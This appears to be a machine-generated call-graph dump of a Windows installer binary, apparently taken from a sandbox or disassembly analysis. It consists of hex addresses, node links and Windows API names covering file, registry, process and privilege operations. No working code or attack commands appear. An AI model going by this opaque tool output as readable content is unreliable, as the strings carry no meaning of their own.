4561->4528 4963 404267 lstrlenW 4964 404286 4963->4964 4965 404288 WideCharToMultiByte 4963->4965 4964->4965 4966 100018a9 4967 100018cc 4966->4967 4968 100018ff GlobalFree 4967->4968 4969 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4967->4969 4968->4969 4970 10001272 2 API calls 4969->4970 4971 10001a87 GlobalFree GlobalFree 4970->4971 4972 401ee9 4973 402bbf 18 API calls 4972->4973 4974 401ef0 4973->4974 4975 406398 2 API calls 4974->4975 4976 401ef6 4975->4976 4978 401f07 4976->4978 4979 405f9c wsprintfW 4976->4979 4979->4978 4980 4021ea 4981 402bbf 18 API calls 4980->4981 4982 4021f0 4981->4982 4983 402bbf 18 API calls 4982->4983 4984 4021f9 4983->4984 4985 402bbf 18 API calls 4984->4985 4986 402202 4985->4986 4987 406398 2 API calls 4986->4987 4988 40220b 4987->4988 4989 40221c lstrlenW lstrlenW 4988->4989 4990 40220f 4988->4990 4992 4051b4 25 API calls 4989->4992 4991 4051b4 25 API calls 4990->4991 4994 402217 4990->4994 4991->4994 4993 40225a SHFileOperationW 4992->4993 4993->4990 4993->4994 4995 40156b 4996 401584 4995->4996 4997 40157b ShowWindow 4995->4997 4998 401592 ShowWindow 4996->4998 4999 402a4c 4996->4999 4997->4996 4998->4999 5000 40456d 5001 4045a3 5000->5001 5002 40457d 5000->5002 5004 404180 8 API calls 5001->5004 5003 404119 19 API calls 5002->5003 5005 40458a SetDlgItemTextW 5003->5005 5006 4045af 5004->5006 5005->5001 5007 40226e 5008 402275 5007->5008 5010 402288 5007->5010 5009 406077 18 API calls 5008->5009 5011 402282 5009->5011 5012 40579a MessageBoxIndirectW 5011->5012 5012->5010 5013 4014f1 SetForegroundWindow 5014 402a4c 5013->5014 5015 401673 5016 402bbf 18 API calls 5015->5016 5017 40167a 5016->5017 5018 402bbf 18 API calls 5017->5018 5019 401683 5018->5019 5020 402bbf 18 API calls 5019->5020 5021 40168c MoveFileW 5020->5021 5022 40169f 5021->5022 5028 401698 5021->5028 5024 406398 2 API calls 5022->5024 5026 4021e1 5022->5026 5023 401423 25 API calls 5023->5026 5025 4016ae 5024->5025 5025->5026 5027 405ef6 38 API calls 5025->5027 5027->5028 5028->5023 5029 4052f3 5030 405314 GetDlgItem GetDlgItem GetDlgItem 5029->5030 5031 40549d 5029->5031 5074 40414e SendMessageW 5030->5074 5033 4054a6 GetDlgItem CreateThread CloseHandle 5031->5033 5034 4054ce 5031->5034 5033->5034 5036 4054f9 5034->5036 5037 4054e5 ShowWindow ShowWindow 5034->5037 5038 40551e 5034->5038 5035 405384 5043 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5035->5043 5040 405533 ShowWindow 5036->5040 5041 40550d 5036->5041 5044 405559 5036->5044 5076 40414e SendMessageW 5037->5076 5042 404180 8 API calls 5038->5042 5047 405553 5040->5047 5048 405545 5040->5048 5045 4040f2 SendMessageW 5041->5045 5046 40552c 5042->5046 5049 4053f9 5043->5049 5050 4053dd SendMessageW SendMessageW 5043->5050 5044->5038 5051 405567 SendMessageW 5044->5051 5045->5038 5056 4040f2 SendMessageW 5047->5056 5055 4051b4 25 API calls 5048->5055 5052 40540c 5049->5052 5053 4053fe SendMessageW 5049->5053 5050->5049 5051->5046 5054 405580 CreatePopupMenu 5051->5054 5058 404119 19 API calls 5052->5058 5053->5052 5057 406077 18 API calls 5054->5057 5055->5047 5056->5044 5059 405590 AppendMenuW 5057->5059 5060 40541c 5058->5060 5061 4055c0 TrackPopupMenu 5059->5061 5062 4055ad GetWindowRect 5059->5062 5063 405425 ShowWindow 5060->5063 5064 405459 GetDlgItem SendMessageW 5060->5064 5061->5046 5065 4055db 5061->5065 5062->5061 5066 405448 5063->5066 5067 40543b ShowWindow 5063->5067 5064->5046 5068 405480 SendMessageW SendMessageW 5064->5068 5069 4055f7 SendMessageW 5065->5069 5075 40414e SendMessageW 5066->5075 5067->5066 5068->5046 5069->5069 5070 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5069->5070 5072 405639 SendMessageW 5070->5072 5072->5072 5073 405662 GlobalUnlock SetClipboardData CloseClipboard 5072->5073 5073->5046 5074->5035 5075->5064 5076->5036 5077 100016b6 5078 100016e5 5077->5078 5079 10001b18 22 API calls 5078->5079 5080 100016ec 5079->5080 5081 100016f3 5080->5081 5082 100016ff 5080->5082 5083 10001272 2 API calls 5081->5083 5084 10001726 5082->5084 5085 10001709 5082->5085 5086 100016fd 5083->5086 5088 10001750 5084->5088 5089 1000172c 5084->5089 5087 1000153d 3 API calls 5085->5087 5091 1000170e 5087->5091 5090 1000153d 3 API calls 5088->5090 5092 100015b4 3 API calls 5089->5092 5090->5086 5093 100015b4 3 API calls 5091->5093 5094 10001731 5092->5094 5095 10001714 5093->5095 5096 10001272 2 API calls 5094->5096 5098 10001272 2 API calls 5095->5098 5097 10001737 GlobalFree 5096->5097 5097->5086 5099 1000174b GlobalFree 5097->5099 5100 1000171a GlobalFree 5098->5100 5099->5086 5100->5086 5101 10002238 5102 10002296 5101->5102 5104 100022cc 5101->5104 5103 100022a8 GlobalAlloc 5102->5103 5102->5104 5103->5102 5105 401cfa GetDlgItem GetClientRect 5106 402bbf 18 API calls 5105->5106 5107 401d2c LoadImageW SendMessageW 5106->5107 5108 401d4a DeleteObject 5107->5108 5109 402a4c 5107->5109 5108->5109 4729 4027fb 4730 402bbf 18 API calls 4729->4730 4731 402802 FindFirstFileW 4730->4731 4732 40282a 4731->4732 4736 402815 4731->4736 4733 402833 4732->4733 4737 405f9c wsprintfW 4732->4737 4738 406055 lstrcpynW 4733->4738 4737->4733 4738->4736 4739 40237b 4740 402381 4739->4740 4741 402bbf 18 API calls 4740->4741 4742 402393 4741->4742 4743 402bbf 18 API calls 4742->4743 4744 40239d RegCreateKeyExW 4743->4744 4745 4023c7 4744->4745 4747 40281e 4744->4747 4746 4023e2 4745->4746 4748 402bbf 18 API calls 4745->4748 4750 402ba2 18 API calls 4746->4750 4752 4023ee 4746->4752 4749 4023d8 lstrlenW 4748->4749 4749->4746 4750->4752 4751 402409 RegSetValueExW 4754 40241f RegCloseKey 4751->4754 4752->4751 4753 403027 32 API calls 4752->4753 4753->4751 4754->4747 5110 1000103d 5111 1000101b 5 API calls 5110->5111 5112 10001056 5111->5112 5113 4014ff 5114 401507 5113->5114 5116 40151a 5113->5116 5115 402ba2 18 API calls 5114->5115 5115->5116 5117 401000 5118 401037 BeginPaint GetClientRect 5117->5118 5119 40100c DefWindowProcW 5117->5119 5121 4010f3 5118->5121 5122 401179 5119->5122 5123 401073 CreateBrushIndirect FillRect DeleteObject 5121->5123 5124 4010fc 5121->5124 5123->5121 5125 401102 CreateFontIndirectW 5124->5125 5126 401167 EndPaint 5124->5126 5125->5126 5127 401112 6 API calls 5125->5127 5126->5122 5127->5126 5128 401904 5129 40193b 5128->5129 5130 402bbf 18 API calls 5129->5130 5131 401940 5130->5131 5132 405846 69 API calls 5131->5132 5133 401949 5132->5133 5134 402d04 5135 402d16 SetTimer 5134->5135 5137 402d2f 5134->5137 5135->5137 5136 402d84 5137->5136 5138 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5137->5138 5138->5136 4511 402786 4512 40278d 4511->4512 4514 4029f7 4511->4514 4513 402ba2 18 API calls 4512->4513 4515 402798 4513->4515 4516 40279f SetFilePointer 4515->4516 4516->4514 4517 4027af 4516->4517 4519 405f9c wsprintfW 4517->4519 4519->4514 4562 100027c7 4563 10002817 4562->4563 4564 100027d7 VirtualProtect 4562->4564 4564->4563 5139 401907 5140 402bbf 18 API calls 5139->5140 5141 40190e 5140->5141 5142 40579a MessageBoxIndirectW 5141->5142 5143 401917 5142->5143 5144 401e08 5145 402bbf 18 API calls 5144->5145 5146 401e0e 5145->5146 5147 402bbf 18 API calls 5146->5147 5148 401e17 5147->5148 5149 402bbf 18 API calls 5148->5149 5150 401e20 5149->5150 5151 402bbf 18 API calls 5150->5151 5152 401e29 5151->5152 5153 401423 25 API calls 5152->5153 5154 401e30 ShellExecuteW 5153->5154 5155 401e61 5154->5155 5161 40490a 5162 404936 5161->5162 5163 40491a 5161->5163 5165 404969 5162->5165 5166 40493c SHGetPathFromIDListW 5162->5166 5172 40577e GetDlgItemTextW 5163->5172 5168 404953 SendMessageW 5166->5168 5169 40494c 5166->5169 5167 404927 SendMessageW 5167->5162 5168->5165 5170 40140b 2 API calls 5169->5170 5170->5168 5172->5167 5173 1000164f 5174 10001516 GlobalFree 5173->5174 5176 10001667 5174->5176 5175 100016ad GlobalFree 5176->5175 5177 10001682 5176->5177 5178 10001699 VirtualFree 5176->5178 5177->5175 5178->5175 4687 402095 4688 402bbf 18 API calls 4687->4688 4689 40209c 4688->4689 4690 402bbf 18 API calls 4689->4690 4691 4020a6 4690->4691 4692 402bbf 18 API calls 4691->4692 4693 4020b0 4692->4693 4694 402bbf 18 API calls 4693->4694 4695 4020ba 4694->4695 4696 402bbf 18 API calls 4695->4696 4698 4020c4 4696->4698 4697 402103 CoCreateInstance 4702 402122 4697->4702 4698->4697 4699 402bbf 18 API calls 4698->4699 4699->4697 4700 401423 25 API calls 4701 4021e1 4700->4701 4702->4700 4702->4701 5179 401a15 5180 402bbf 18 API calls 5179->5180 5181 401a1e ExpandEnvironmentStringsW 5180->5181 5182 401a32 5181->5182 5184 401a45 5181->5184 5183 401a37 lstrcmpW 5182->5183 5182->5184 5183->5184 5185 402515 5186 402bbf 18 API calls 5185->5186 5187 40251c 5186->5187 5190 405c2a GetFileAttributesW CreateFileW 5187->5190 5189 402528 5189->5189 5190->5189 5191 401b16 5192 402bbf 18 API calls 5191->5192 5193 401b1d 5192->5193 5194 402ba2 18 API calls 5193->5194 5195 401b26 wsprintfW 5194->5195 5196 402a4c 5195->5196 5197 10001058 5199 10001074 5197->5199 5198 100010dd 5199->5198 5200 10001516 GlobalFree 5199->5200 5201 10001092 5199->5201 5200->5201 5202 10001516 GlobalFree 5201->5202 5203 100010a2 5202->5203 5204 100010b2 5203->5204 5205 100010a9 GlobalSize 5203->5205 5206 100010b6 GlobalAlloc 5204->5206 5207 100010c7 5204->5207 5205->5204 5208 1000153d 3 API calls 5206->5208 5209 100010d2 GlobalFree 5207->5209 5208->5207 5209->5198 4756 40159b 4757 402bbf 18 API calls 4756->4757 4758 4015a2 SetFileAttributesW 4757->4758 4759 4015b4 4758->4759 4768 40229d 4769 4022a5 4768->4769 4770 4022ab 4768->4770 4772 402bbf 18 API calls 4769->4772 4771 4022b9 4770->4771 4773 402bbf 18 API calls 4770->4773 4774 4022c7 4771->4774 4775 402bbf 18 API calls 4771->4775 4772->4770 4773->4771 4776 402bbf 18 API calls 4774->4776 4775->4774 4777 4022d0 WritePrivateProfileStringW 4776->4777 5210 401f1d 5211 402bbf 18 API calls 5210->5211 5212 401f24 5211->5212 5213 40642b 5 API calls 5212->5213 5214 401f33 5213->5214 5215 401fb7 5214->5215 5216 401f4f GlobalAlloc 5214->5216 5216->5215 5217 401f63 5216->5217 5218 40642b 5 API calls 5217->5218 5219 401f6a 5218->5219 5220 40642b 5 API calls 5219->5220 5221 401f74 5220->5221 5221->5215 5225 405f9c wsprintfW 5221->5225 5223 401fa9 5226 405f9c wsprintfW 5223->5226 5225->5223 5226->5215 5227 40149e 5228 402288 5227->5228 5229 4014ac PostQuitMessage 5227->5229 5229->5228 5230 40249e 5231 402cc9 19 API calls 5230->5231 5232 4024a8 5231->5232 5233 402ba2 18 API calls 5232->5233 5234 4024b1 5233->5234 5235 4024d5 RegEnumValueW 5234->5235 5236 4024c9 RegEnumKeyW 5234->5236 5238 40281e 5234->5238 5237 4024ee RegCloseKey 5235->5237 5235->5238 5236->5237 5237->5238 5240 40231f 5241 402324 5240->5241 5242 40234f 5240->5242 5243 402cc9 19 API calls 5241->5243 5244 402bbf 18 API calls 5242->5244 5245 40232b 5243->5245 5246 402356 5244->5246 5247 402bbf 18 API calls 5245->5247 5250 40236c 5245->5250 5251 402bff RegOpenKeyExW 5246->5251 5248 40233c RegDeleteValueW RegCloseKey 5247->5248 5248->5250 5258 402c76 5251->5258 5259 402c2a 5251->5259 5252 402c50 RegEnumKeyW 5253 402c62 RegCloseKey 5252->5253 5252->5259 5255 40642b 5 API calls 5253->5255 5254 402c87 RegCloseKey 5254->5258 5257 402c72 5255->5257 5256 402bff 5 API calls 5256->5259 5257->5258 5260 402ca2 RegDeleteKeyW 5257->5260 5258->5250 5259->5252 5259->5253 5259->5254 5259->5256 5260->5258 3715 4032a0 SetErrorMode GetVersion 3716 4032d4 3715->3716 3717 4032da 3715->3717 3718 40642b 5 API calls 3716->3718 3806 4063bf GetSystemDirectoryW 3717->3806 3718->3717 3720 4032f1 3721 4063bf 3 API calls 3720->3721 3722 4032fb 3721->3722 3723 4063bf 3 API calls 3722->3723 3724 403305 3723->3724 3809 40642b GetModuleHandleA 3724->3809 3727 40642b 5 API calls 3728 403313 #17 OleInitialize SHGetFileInfoW 3727->3728 3815 406055 lstrcpynW 3728->3815 3730 403350 GetCommandLineW 3816 406055 lstrcpynW 3730->3816 3732 403362 GetModuleHandleW 3733 40337a 3732->3733 3817 405a36 3733->3817 3736 4034b4 GetTempPathW 3821 40326f 3736->3821 3738 4034cc 3739 4034d0 GetWindowsDirectoryW lstrcatW 3738->3739 3740 403526 DeleteFileW 3738->3740 3742 40326f 12 API calls 3739->3742 3831 402dee GetTickCount GetModuleFileNameW 3740->3831 3741 4033a2 3743 405a36 CharNextW 3741->3743 3749 40349f 3741->3749 3751 40349d 3741->3751 3745 4034ec 3742->3745 3743->3741 3745->3740 3747 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3745->3747 3746 40353a 3752 405a36 CharNextW 3746->3752 3788 4035dd 3746->3788 3801 4035ed 3746->3801 3750 40326f 12 API calls 3747->3750 3915 406055 lstrcpynW 3749->3915 3756 40351e 3750->3756 3751->3736 3768 403559 3752->3768 3756->3740 3756->3801 3757 403728 3760 403730 GetCurrentProcess OpenProcessToken 3757->3760 3761 4037ac ExitProcess 3757->3761 3758 403608 3939 40579a 3758->3939 3766 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3760->3766 3767 40377c 3760->3767 3763 4035b7 3916 405b11 3763->3916 3764 40361e 3943 40571d 3764->3943 3766->3767 3771 40642b 5 API calls 3767->3771 3768->3763 3768->3764 3782 403783 3771->3782 3774 403798 ExitWindowsEx 3774->3761 3777 4037a5 3774->3777 3775 403634 lstrcatW 3776 40363f lstrcatW lstrcmpiW 3775->3776 3779 40365b 3776->3779 3776->3801 3981 40140b 3777->3981 3780 403660 3779->3780 3781 403667 3779->3781 3946 405683 CreateDirectoryW 3780->3946 3951 405700 CreateDirectoryW 3781->3951 3782->3774 3782->3777 3784 4035d2 3931 406055 lstrcpynW 3784->3931 3859 40389e 3788->3859 3790 40366c SetCurrentDirectoryW 3791 403687 3790->3791 3792 40367c 3790->3792 3955 406055 lstrcpynW 3791->3955 3954 406055 lstrcpynW 3792->3954 3797 4036d3 CopyFileW 3803 403695 3797->3803 3798 40371c 3800 405ef6 38 API calls 3798->3800 3800->3801 3932 4037c4 3801->3932 3802 406077 18 API calls 3802->3803 3803->3798 3803->3802 3805 403707 CloseHandle 3803->3805 3956 406077 3803->3956 3974 405ef6 MoveFileExW 3803->3974 3978 405735 CreateProcessW 3803->3978 3805->3803 3807 4063e1 wsprintfW LoadLibraryW 3806->3807 3807->3720 3810 406451 GetProcAddress 3809->3810 3811 406447 3809->3811 3813 40330c 3810->3813 3812 4063bf 3 API calls 3811->3812 3814 40644d 3812->3814 3813->3727 3814->3810 3814->3813 3815->3730 3816->3732 3818 405a3c 3817->3818 3819 403389 CharNextW 3818->3819 3820 405a43 CharNextW 3818->3820 3819->3736 3819->3741 3820->3818 3984 4062e9 3821->3984 3823 403285 3823->3738 3824 40327b 3824->3823 3993 405a09 lstrlenW CharPrevW 3824->3993 3827 405700 2 API calls 3828 403293 3827->3828 3996 405c59 3828->3996 4000 405c2a GetFileAttributesW CreateFileW 3831->4000 3833 402e2e 3852 402e3e 3833->3852 4001 406055 lstrcpynW 3833->4001 3835 402e54 4002 405a55 lstrlenW 3835->4002 3839 402e65 GetFileSize 3840 402f61 3839->3840 3858 402e7c 3839->3858 4007 402d8a 3840->4007 3842 402f6a 3844 402f9a GlobalAlloc 3842->3844 3842->3852 4042 403258 SetFilePointer 3842->4042 4018 403258 SetFilePointer 3844->4018 3847 402fcd 3849 402d8a 6 API calls 3847->3849 3848 402fb5 4019 403027 3848->4019 3849->3852 3850 402f83 3853 403242 ReadFile 3850->3853 3852->3746 3855 402f8e 3853->3855 3854 402d8a 6 API calls 3854->3858 3855->3844 3855->3852 3856 402fc1 3856->3852 3856->3856 3857 402ffe SetFilePointer 3856->3857 3857->3852 3858->3840 3858->3847 3858->3852 3858->3854 4039 403242 3858->4039 3860 40642b 5 API calls 3859->3860 3861 4038b2 3860->3861 3862 4038b8 GetUserDefaultUILanguage 3861->3862 3863 4038ca 3861->3863 4063 405f9c wsprintfW 3862->4063 4073 405f22 RegOpenKeyExW 3863->4073 3866 4038c8 4064 403b74 3866->4064 3868 403919 lstrcatW 3868->3866 3869 405f22 3 API calls 3869->3868 3872 405b11 18 API calls 3873 40394b 3872->3873 3874 4039df 3873->3874 3877 405f22 3 API calls 3873->3877 3875 405b11 18 API calls 3874->3875 3876 4039e5 3875->3876 3879 4039f5 LoadImageW 3876->3879 3880 406077 18 API calls 3876->3880 3878 40397d 3877->3878 3878->3874 3883 40399e lstrlenW 3878->3883 3887 405a36 CharNextW 3878->3887 3881 403a9b 3879->3881 3882 403a1c RegisterClassW 3879->3882 3880->3879 3886 40140b 2 API calls 3881->3886 3884 403a52 SystemParametersInfoW CreateWindowExW 3882->3884 3885 403aa5 3882->3885 3888 4039d2 3883->3888 3889 4039ac lstrcmpiW 3883->3889 3884->3881 3885->3801 3890 403aa1 3886->3890 3891 40399b 3887->3891 3893 405a09 3 API calls 3888->3893 3889->3888 3892 4039bc GetFileAttributesW 3889->3892 3890->3885 3895 403b74 19 API calls 3890->3895 3891->3883 3894 4039c8 3892->3894 3896 4039d8 3893->3896 3894->3888 3897 405a55 2 API calls 3894->3897 3898 403ab2 3895->3898 4078 406055 lstrcpynW 3896->4078 3897->3888 3900 403b41 3898->3900 3901 403abe ShowWindow 3898->3901 4079 405287 OleInitialize 3900->4079 3903 4063bf 3 API calls 3901->3903 3904 403ad6 3903->3904 3906 403ae4 GetClassInfoW 3904->3906 3908 4063bf 3 API calls 3904->3908 3905 403b47 3907 403b63 3905->3907 3912 403b4b 3905->3912 3910 403af8 GetClassInfoW RegisterClassW 3906->3910 3911 403b0e DialogBoxParamW 3906->3911 3909 40140b 2 API calls 3907->3909 3908->3906 3909->3885 3910->3911 3913 40140b 2 API calls 3911->3913 3912->3885 3914 40140b 2 API calls 3912->3914 3913->3885 3914->3885 3915->3751 4094 406055 lstrcpynW 3916->4094 3918 405b22 4095 405ab4 CharNextW CharNextW 3918->4095 3921 4035c3 3921->3801 3930 406055 lstrcpynW 3921->3930 3922 4062e9 5 API calls 3923 405b38 3922->3923 3923->3921 3924 405b69 lstrlenW 3923->3924 3929 405a55 2 API calls 3923->3929 4101 406398 FindFirstFileW 3923->4101 3924->3923 3925 405b74 3924->3925 3926 405a09 3 API calls 3925->3926 3928 405b79 GetFileAttributesW 3926->3928 3928->3921 3929->3924 3930->3784 3931->3788 3933 4037dc 3932->3933 3934 4037ce CloseHandle 3932->3934 4104 403809 3933->4104 3934->3933 3940 4057af 3939->3940 3941 403616 ExitProcess 3940->3941 3942 4057c3 MessageBoxIndirectW 3940->3942 3942->3941 3944 40642b 5 API calls 3943->3944 3945 403623 lstrcatW 3944->3945 3945->3775 3945->3776 3947 403665 3946->3947 3948 4056d4 GetLastError 3946->3948 3947->3790 3948->3947 3949 4056e3 SetFileSecurityW 3948->3949 3949->3947 3950 4056f9 GetLastError 3949->3950 3950->3947 3952 405710 3951->3952 3953 405714 GetLastError 3951->3953 3952->3790 3953->3952 3954->3791 3955->3803 3965 406084 3956->3965 3957 4062cf 3958 4036c6 DeleteFileW 3957->3958 4163 406055 lstrcpynW 3957->4163 3958->3797 3958->3803 3960 406137 GetVersion 3960->3965 3961 40629d lstrlenW 3961->3965 3964 406077 10 API calls 3964->3961 3965->3957 3965->3960 3965->3961 3965->3964 3966 405f22 3 API calls 3965->3966 3967 4061b2 GetSystemDirectoryW 3965->3967 3968 4061c5 GetWindowsDirectoryW 3965->3968 3969 4062e9 5 API calls 3965->3969 3970 4061f9 SHGetSpecialFolderLocation 3965->3970 3971 406077 10 API calls 3965->3971 3972 40623e lstrcatW 3965->3972 4161 405f9c wsprintfW 3965->4161 4162 406055 lstrcpynW 3965->4162 3966->3965 3967->3965 3968->3965 3969->3965 3970->3965 3973 406211 SHGetPathFromIDListW CoTaskMemFree 3970->3973 3971->3965 3972->3965 3973->3965 3975 405f17 3974->3975 3976 405f0a 3974->3976 3975->3803 4164 405d84 lstrcpyW 3976->4164 3979 405774 3978->3979 3980 405768 CloseHandle 3978->3980 3979->3803 3980->3979 3982 401389 2 API calls 3981->3982 3983 401420 3982->3983 3983->3761 3991 4062f6 3984->3991 3985 40636c 3986 406371 CharPrevW 3985->3986 3988 406392 3985->3988 3986->3985 3987 40635f CharNextW 3987->3985 3987->3991 3988->3824 3989 405a36 CharNextW 3989->3991 3990 40634b CharNextW 3990->3991 3991->3985 3991->3987 3991->3989 3991->3990 3992 40635a CharNextW 3991->3992 3992->3987 3994 40328d 3993->3994 3995 405a25 lstrcatW 3993->3995 3994->3827 3995->3994 3997 405c66 GetTickCount GetTempFileNameW 3996->3997 3998 40329e 3997->3998 3999 405c9c 3997->3999 3998->3738 3999->3997 3999->3998 4000->3833 4001->3835 4003 405a63 4002->4003 4004 402e5a 4003->4004 4005 405a69 CharPrevW 4003->4005 4006 406055 lstrcpynW 4004->4006 4005->4003 4005->4004 4006->3839 4008 402d93 4007->4008 4009 402dab 4007->4009 4010 402da3 4008->4010 4011 402d9c DestroyWindow 4008->4011 4012 402db3 4009->4012 4013 402dbb GetTickCount 4009->4013 4010->3842 4011->4010 4043 406467 4012->4043 4015 402dc9 CreateDialogParamW ShowWindow 4013->4015 4016 402dec 4013->4016 4015->4016 4016->3842 4018->3848 4020 403040 4019->4020 4021 40306e 4020->4021 4049 403258 SetFilePointer 4020->4049 4023 403242 ReadFile 4021->4023 4024 403079 4023->4024 4025 4031db 4024->4025 4026 40308b GetTickCount 4024->4026 4034 4031c5 4024->4034 4027 40321d 4025->4027 4032 4031df 4025->4032 4026->4034 4038 4030da 4026->4038 4028 403242 ReadFile 4027->4028 4028->4034 4029 403242 ReadFile 4029->4038 4030 403242 ReadFile 4030->4032 4031 405cdc WriteFile 4031->4032 4032->4030 4032->4031 4032->4034 4033 403130 GetTickCount 4033->4038 4034->3856 4035 403155 MulDiv wsprintfW 4050 4051b4 4035->4050 4038->4029 4038->4033 4038->4034 4038->4035 4047 405cdc WriteFile 4038->4047 4061 405cad ReadFile 4039->4061 4042->3850 4044 406484 PeekMessageW 4043->4044 4045 402db9 4044->4045 4046 40647a DispatchMessageW 4044->4046 4045->3842 4046->4044 4048 405cfa 4047->4048 4048->4038 4049->4021 4051 405271 4050->4051 4052 4051cf 4050->4052 4051->4038 4053 4051eb lstrlenW 4052->4053 4054 406077 18 API calls 4052->4054 4055 405214 4053->4055 4056 4051f9 lstrlenW 4053->4056 4054->4053 4058 405227 4055->4058 4059 40521a SetWindowTextW 4055->4059 4056->4051 4057 40520b lstrcatW 4056->4057 4057->4055 4058->4051 4060 40522d SendMessageW SendMessageW SendMessageW 4058->4060 4059->4058 4060->4051 4062 403255 4061->4062 4062->3858 4063->3866 4065 403b88 4064->4065 4086 405f9c wsprintfW 4065->4086 4067 403bf9 4068 406077 18 API calls 4067->4068 4069 403c05 SetWindowTextW 4068->4069 4070 403c21 4069->4070 4071 403929 4069->4071 4070->4071 4072 406077 18 API calls 4070->4072 4071->3872 4072->4070 4074 4038fa 4073->4074 4075 405f56 RegQueryValueExW 4073->4075 4074->3868 4074->3869 4076 405f77 RegCloseKey 4075->4076 4076->4074 4078->3874 4087 404165 4079->4087 4081 4052aa 4085 4052d1 4081->4085 4090 401389 4081->4090 4082 404165 SendMessageW 4083 4052e3 OleUninitialize 4082->4083 4083->3905 4085->4082 4086->4067 4088 40417d 4087->4088 4089 40416e SendMessageW 4087->4089 4088->4081 4089->4088 4092 401390 4090->4092 4091 4013fe 4091->4081 4092->4091 4093 4013cb MulDiv SendMessageW 4092->4093 4093->4092 4094->3918 4096 405ad1 4095->4096 4097 405ae3 4095->4097 4096->4097 4098 405ade CharNextW 4096->4098 4099 405a36 CharNextW 4097->4099 4100 405b07 4097->4100 4098->4100 4099->4097 4100->3921 4100->3922 4102 4063b9 4101->4102 4103 4063ae FindClose 4101->4103 4102->3923 4103->4102 4105 403817 4104->4105 4106 4037e1 4105->4106 4107 40381c FreeLibrary GlobalFree 4105->4107 4108 405846 4106->4108 4107->4106 4107->4107 4109 405b11 18 API calls 4108->4109 4110 405866 4109->4110 4111 405885 4110->4111 4112 40586e DeleteFileW 4110->4112 4114 4059b0 4111->4114 4148 406055 lstrcpynW 4111->4148 4113 4035f6 OleUninitialize 4112->4113 4113->3757 4113->3758 4114->4113 4119 406398 2 API calls 4114->4119 4116 4058ab 4117 4058b1 lstrcatW 4116->4117 4118 4058be 4116->4118 4120 4058c4 4117->4120 4121 405a55 2 API calls 4118->4121 4124 4059ca 4119->4124 4122 4058d4 lstrcatW 4120->4122 4123 4058ca 4120->4123 4121->4120 4125 4058df lstrlenW FindFirstFileW 4122->4125 4123->4122 4123->4125 4124->4113 4126 4059ce 4124->4126 4127 405901 4125->4127 4128 4059a5 4125->4128 4129 405a09 3 API calls 4126->4129 4131 405988 FindNextFileW 4127->4131 4141 405846 62 API calls 4127->4141 4143 4051b4 25 API calls 4127->4143 4145 4051b4 25 API calls 4127->4145 4147 405ef6 38 API calls 4127->4147 4149 406055 lstrcpynW 4127->4149 4150 4057fe 4127->4150 4128->4114 4130 4059d4 4129->4130 4132 4057fe 5 API calls 4130->4132 4131->4127 4135 40599e FindClose 4131->4135 4134 4059e0 4132->4134 4136 4059e4 4134->4136 4137 4059fa 4134->4137 4135->4128 4136->4113 4140 4051b4 25 API calls 4136->4140 4138 4051b4 25 API calls 4137->4138 4138->4113 4142 4059f1 4140->4142 4141->4127 4144 405ef6 38 API calls 4142->4144 4143->4131 4146 4059f8 4144->4146 4145->4127 4146->4113 4147->4127 4148->4116 4149->4127 4158 405c05 GetFileAttributesW 4150->4158 4153 405821 DeleteFileW 4156 405827 4153->4156 4154 405819 RemoveDirectoryW 4154->4156 4155 40582b 4155->4127 4156->4155 4157 405837 SetFileAttributesW 4156->4157 4157->4155 4159 40580a 4158->4159 4160 405c17 SetFileAttributesW 4158->4160 4159->4153 4159->4154 4159->4155 4160->4159 4161->3965 4162->3965 4163->3958 4165 405dd2 GetShortPathNameW 4164->4165 4166 405dac 4164->4166 4168 405ef1 4165->4168 4169 405de7 4165->4169 4191 405c2a GetFileAttributesW CreateFileW 4166->4191 4168->3975 4169->4168 4171 405def wsprintfA 4169->4171 4170 405db6 CloseHandle GetShortPathNameW 4170->4168 4172 405dca 4170->4172 4173 406077 18 API calls 4171->4173 4172->4165 4172->4168 4174 405e17 4173->4174 4192 405c2a GetFileAttributesW CreateFileW 4174->4192 4176 405e24 4176->4168 4177 405e33 GetFileSize GlobalAlloc 4176->4177 4178 405e55 4177->4178 4179 405eea CloseHandle 4177->4179 4180 405cad ReadFile 4178->4180 4179->4168 4181 405e5d 4180->4181 4181->4179 4193 405b8f lstrlenA 4181->4193 4184 405e74 lstrcpyA 4187 405e96 4184->4187 4185 405e88 4186 405b8f 4 API calls 4185->4186 4186->4187 4188 405ecd SetFilePointer 4187->4188 4189 405cdc WriteFile 4188->4189 4190 405ee3 GlobalFree 4189->4190 4190->4179 4191->4170 4192->4176 4194 405bd0 lstrlenA 4193->4194 4195 405bd8 4194->4195 4196 405ba9 lstrcmpiA 4194->4196 4195->4184 4195->4185 4196->4195 4197 405bc7 CharNextA 4196->4197 4197->4194 5261 100010e1 5264 10001111 5261->5264 5262 100011d8 GlobalFree 5263 100012ba 2 API calls 5263->5264 5264->5262 5264->5263 5265 100011d3 5264->5265 5266 10001272 2 API calls 5264->5266 5267 10001164 GlobalAlloc 5264->5267 5268 100011f8 GlobalFree 5264->5268 5269 100011c4 GlobalFree 5264->5269 5270 100012e1 lstrcpyW 5264->5270 5265->5262 5266->5269 5267->5264 5268->5264 5269->5264 5270->5264 5271 401ca3 5272 402ba2 18 API calls 5271->5272 5273 401ca9 IsWindow 5272->5273 5274 401a05 5273->5274 5275 402a27 SendMessageW 5276 402a41 InvalidateRect 5275->5276 5277 402a4c 5275->5277 5276->5277 4565 405128 4566 405138 4565->4566 4567 40514c 4565->4567 4569 405195 4566->4569 4570 40513e 4566->4570 4568 405154 IsWindowVisible 4567->4568 4577 405174 4567->4577 4568->4569 4571 405161 4568->4571 4572 40519a CallWindowProcW 4569->4572 4573 404165 SendMessageW 4570->4573 4579 404a7e SendMessageW 4571->4579 4575 405148 4572->4575 4573->4575 4577->4572 4584 404afe 4577->4584 4580 404aa1 GetMessagePos ScreenToClient SendMessageW 4579->4580 4581 404add SendMessageW 4579->4581 4582 404ad5 4580->4582 4583 404ada 4580->4583 4581->4582 4582->4577 4583->4581 4593 406055 lstrcpynW 4584->4593 4586 404b11 4594 405f9c wsprintfW 4586->4594 4588 404b1b 4589 40140b 2 API calls 4588->4589 4590 404b24 4589->4590 4595 406055 lstrcpynW 